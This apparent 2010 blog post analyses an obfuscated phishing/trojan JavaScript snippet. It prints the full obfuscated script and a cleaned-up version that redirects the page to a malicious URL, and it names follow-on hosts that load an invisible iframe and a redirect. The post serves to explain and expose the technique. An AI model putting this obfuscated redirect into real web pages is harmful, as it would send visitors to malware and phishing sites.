Oh boy! Obfuscated Trojans oh my.
June 11th, 2010
No comments
New phishing/trojan JavaScripts running amok. Got this gem recently–
<script type=’text/java script’>
function uK(){};
var kV=”;
uK.prototype = {
f : function() {
d=4906;
var w=function(){};
var u=new Date();
var hK=function(){};
var h=’hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^’.replace(/[\^H\!9X]/g, ”);
var n=new Array();
var e=function(){};
var eJ=”;
t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, ”)];
this.nH=false;
eX=2280;
dF=”dF”;
var hN=function(){ return ‘hN’ };
this.g=6633;
var a=”;
dK=”";
function x(b){
var aF=new Array();
this.q=”;
var hKB=false;
var uN=”";
b['hIrBeTf.'.replace(/[\.BTAI]/g, ”)]=h;
this.qO=15083;
uR=”;
var hB=new Date();
s=”s”;
}
var dI=46541;
gN=55114;
this.c=”c”;
nT=”";
this.bG=false;
var m=new Date();
var fJ=49510;
x(t);
this.y=”";
bL=”;
var k=new Date();
var mE=function(){};
}
};
var l=22739;
var tL=new uK();
var p=”";
tL.f();
this.kY=false;
</script>
Which after you remove the huge loads of crap is…
<script type=’text/java script’>
function uK(){};
uK.prototype = {
f : function() {
var h=’http://lendermedia.com/images/z.htm’;
t=document['location'];
function x(b) { b['href']=h; }
x(t);
}
};
var tL=new uK();
tL.f();
</script>
Which is document.location.href = http://lender media.com/images/z.htm which loads this code:
http://zoo jeans.ru:8080/index.php?pid=10 in an invisible iframe
http://told speak.com/ redirects here after 3s
Cute stuff, easy to decipher, but it’ll snag a lot of people since the message is directed from the originating domain back to itself, which is a bit different.
Categories: Technology